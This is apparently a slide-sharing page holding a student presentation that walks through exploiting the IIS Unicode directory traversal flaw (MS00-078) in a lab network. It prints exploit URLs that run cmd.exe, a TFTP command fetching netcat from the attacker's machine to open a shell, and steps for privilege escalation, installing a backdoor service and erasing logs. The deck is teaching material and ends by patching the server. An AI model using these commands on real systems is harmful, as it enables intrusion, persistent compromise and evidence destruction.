presentation

A Case Study inA Case Study in
Software ExploitationSoftware Exploitation
The Unicode DirectoryThe Unicode Directory
Traversal VulnerabilityTraversal Vulnerability
( As described in Microsoft( As described in Microsoft
Security Bulletin MS00-078 )Security Bulletin MS00-078 )
By: Peter Oswald

Flaw exists in IIS (InternetFlaw exists in IIS (Internet
Information Services)Information Services)
 Microsoft’s flagship Web ServerMicrosoft’s flagship Web Server
softwaresoftware
 Is included, but not installed byIs included, but not installed by
default, on all Windows NT/2000default, on all Windows NT/2000
installationsinstallations
 Is installed by default on WindowsIs installed by default on Windows
NT/2000 Server installationsNT/2000 Server installations

Affected Versions of WindowsAffected Versions of Windows
 Microsoft NT 4 Server with IISMicrosoft NT 4 Server with IIS
 Microsoft NT 4 Workstation with IISMicrosoft NT 4 Workstation with IIS
 Microsoft NT 4 Server and Workstation SP1 with IISMicrosoft NT 4 Server and Workstation SP1 with IIS
 Microsoft NT 4 Server and Workstation SP6a with IISMicrosoft NT 4 Server and Workstation SP6a with IIS
 Microsoft Windows 2000 ProfessionalMicrosoft Windows 2000 Professional
 Microsoft Windows 2000 Professional SP 1Microsoft Windows 2000 Professional SP 1
 Microsoft Windows 2000 Professional SP 2Microsoft Windows 2000 Professional SP 2
 Microsoft Windows 2000Microsoft Windows 2000
 Microsoft Windows 2000 SP 1Microsoft Windows 2000 SP 1
 Microsoft Windows 2000 SP 2Microsoft Windows 2000 SP 2
 Microsoft Server 2000Microsoft Server 2000
 Microsoft Server 2000 SP 1Microsoft Server 2000 SP 1
 Microsoft Server 2000 SP 2Microsoft Server 2000 SP 2
 Microsoft Advanced Server 2000Microsoft Advanced Server 2000
 Microsoft Advanced Server 2000 SP 1Microsoft Advanced Server 2000 SP 1
 Microsoft Advanced Server 2000 SP 2Microsoft Advanced Server 2000 SP 2
 Microsoft Datacenter Server 2000Microsoft Datacenter Server 2000
 Microsoft Datacenter Server 2000 SP 1Microsoft Datacenter Server 2000 SP 1
 Microsoft Datacenter Server 2000 SP 2Microsoft Datacenter Server 2000 SP 2
 Microsoft Windows 98 w/ Personal Web Server 4Microsoft Windows 98 w/ Personal Web Server 4
PATCHED ON October 17, 2000PATCHED ON October 17, 2000

UnicodeUnicode
 Essentially, Unicode is a single character encodingEssentially, Unicode is a single character encoding
set that canvases all of the world’s differentset that canvases all of the world’s different
languages.languages.
 IIS does not properly check for Unicode encoding,IIS does not properly check for Unicode encoding,
allowing attackers to encode such characters asallowing attackers to encode such characters as
"/“ or "" to appear as their Unicode counterparts"/“ or "" to appear as their Unicode counterparts
and therefore allow attackers to bypass securityand therefore allow attackers to bypass security
mechanisms within IIS.mechanisms within IIS.

Standard Directory TraversingStandard Directory Traversing
 As many of you know, you canAs many of you know, you can
traverse down a directory in MS-DOStraverse down a directory in MS-DOS
with “..”, here we traverse down twowith “..”, here we traverse down two
directories with “....”directories with “....”

The IIS “scripts” directoryThe IIS “scripts” directory
 IIS provides a “scripts” directory (usuallyIIS provides a “scripts” directory (usually
located in Inetpubscripts) which is usedlocated in Inetpubscripts) which is used
to allow for easy execution of CGI scriptsto allow for easy execution of CGI scripts
 By default it allows any .exe file in theBy default it allows any .exe file in the
scripts directory to be executed, howeverscripts directory to be executed, however
all scripts/executables run from within theall scripts/executables run from within the
scripts directory run under a restrictedscripts directory run under a restricted
“IUSR” account, which is a member of the“IUSR” account, which is a member of the
localgroup “guests” (minimal permissions)localgroup “guests” (minimal permissions)

IIS Scripts Directory + UnicodeIIS Scripts Directory + Unicode
Vulnerabilty + Knowing how toVulnerabilty + Knowing how to
Traverse =Traverse =
 An attacker can now use a web browser toAn attacker can now use a web browser to
traverse down from the Inetpubscriptstraverse down from the Inetpubscripts
directory to the root directory, and rundirectory to the root directory, and run
files anywhere on the systemfiles anywhere on the system as ifas if theythey
were in the scripts directory.were in the scripts directory.
 This allowed for contents of directories toThis allowed for contents of directories to
be read, as well as executed, with thebe read, as well as executed, with the
permissions of a guest account.permissions of a guest account.

Environment SetupEnvironment Setup
Attackers Machine
192.168.0.7
ROUTER
Vulnerable Machine
192.168.0.16
WINDOWS XP
PROFESSIONAL
WINDOWS
2000 SERVER

Example: using Internet Explorer toExample: using Internet Explorer to
view the hard-drive contentsview the hard-drive contents
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+dir%20C:
%255c =
UNICODE for
“/”

InetpubScripts.
...winntsystem
32cmd.exe
=

winntsystem32
cmd.exe

What’s in the financial folder?What’s in the financial folder?
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+dir%20C:financial

What’s in financial.txt ?What’s in financial.txt ?
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+dir%20C:type

We can read files and browseWe can read files and browse
directories, but how to get a shell?directories, but how to get a shell?
 We’ll use TFTP.EXE (Trivial file transferWe’ll use TFTP.EXE (Trivial file transfer
protocol), which comes standard with ALLprotocol), which comes standard with ALL
Windows NT/2000/XP installations toWindows NT/2000/XP installations to
upload Netcat (A popular tool brieflyupload Netcat (A popular tool briefly
discussed by guest speaker Adamdiscussed by guest speaker Adam
Conover)Conover)
 Netcat will allow us to bind an instance ofNetcat will allow us to bind an instance of
cmd.exe (command prompt) to a socket.cmd.exe (command prompt) to a socket.

TFTP UploadTFTP Upload
 We setup a TFTP server on the attackingWe setup a TFTP server on the attacking
machine (192.168.0.7), and upload Netcatmachine (192.168.0.7), and upload Netcat
(nc.exe) to the vulnerable machine(nc.exe) to the vulnerable machine
(192.168.0.16).(192.168.0.16).
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+tftp -i 192.168.0.7 get nc.exe
C:Inetpubscriptsnc.exe

TFTP Server running on Attacker’sTFTP Server running on Attacker’s
MachineMachine

Execute NC (NetCat) to listen onExecute NC (NetCat) to listen on
port 666port 666
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+C:Inetpubscriptsnc.exe -l

Telnet into vulnerable machine onTelnet into vulnerable machine on
port 666port 666

We’ve already got a shell but we want toWe’ve already got a shell but we want to
get Administrator or SYSTEM privileges;get Administrator or SYSTEM privileges;
use a local privilege escalation exploit.use a local privilege escalation exploit.
 Microsoft Security Bulletin (MS02-024) -Microsoft Security Bulletin (MS02-024) -
Authentication Flaw in Windows DebuggerAuthentication Flaw in Windows Debugger
can Lead to Elevated Privileges (Q320206)can Lead to Elevated Privileges (Q320206)
 Program that utilizes this vulnerability:Program that utilizes this vulnerability:
Debploit (ERUNASX.DLL+ERUNASX.EXE),Debploit (ERUNASX.DLL+ERUNASX.EXE),
created by Radim "EliCZ" Pichacreated by Radim "EliCZ" Picha
 We’ll use ERUNASX to run our backdoorWe’ll use ERUNASX to run our backdoor
and elevate our privileges to SYSTEM.and elevate our privileges to SYSTEM.

Backdoor: WinShell v5.0Backdoor: WinShell v5.0
 Will install a service called “WinShell” that willWill install a service called “WinShell” that will
start every time the computer is booted. It willstart every time the computer is booted. It will
listen on port 5277 and provide a variety oflisten on port 5277 and provide a variety of
functions.functions.

Upload ERUNASX.EXE,Upload ERUNASX.EXE,
ERUNASX.DLL, and WinShell viaERUNASX.DLL, and WinShell via
TFTPTFTP

Now execute WinShell (server.exe)Now execute WinShell (server.exe)
using ERUNASXusing ERUNASX

Telnet into port 5277Telnet into port 5277
Winshell is now installed as a service- run with SYSTEM privileges,
giving us complete access to the now fully compromised system.

ConclusionConclusion
 Since the attacker now has SYSTEMSince the attacker now has SYSTEM
privileges, he can delete the web serverprivileges, he can delete the web server
logs, event logs, and other evidence thatlogs, event logs, and other evidence that
would be useful for forensics.would be useful for forensics.
 Attacker can dump the passwordAttacker can dump the password
‘database’ and obtain all of the user‘database’ and obtain all of the user
accounts and passwords.accounts and passwords.
 Attacker can use machine to launchAttacker can use machine to launch
attacks against other machines, etc etc.attacks against other machines, etc etc.

QUESTIONS?QUESTIONS?
http://triton.towson.edu/~poswal1/presentation.ppt
http://triton.towson.edu/~poswal1/paper.doc

Since we are ethical…Since we are ethical…
 We’ll patch the server so nobody elseWe’ll patch the server so nobody else
can come in the same way we did:can come in the same way we did:

Compromised system reboots, isCompromised system reboots, is
no longer vulnerable:no longer vulnerable:
http://192.168.0.16/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+dir%20C:

presentation

More Related Content

What's hot

Similar to presentation

presentation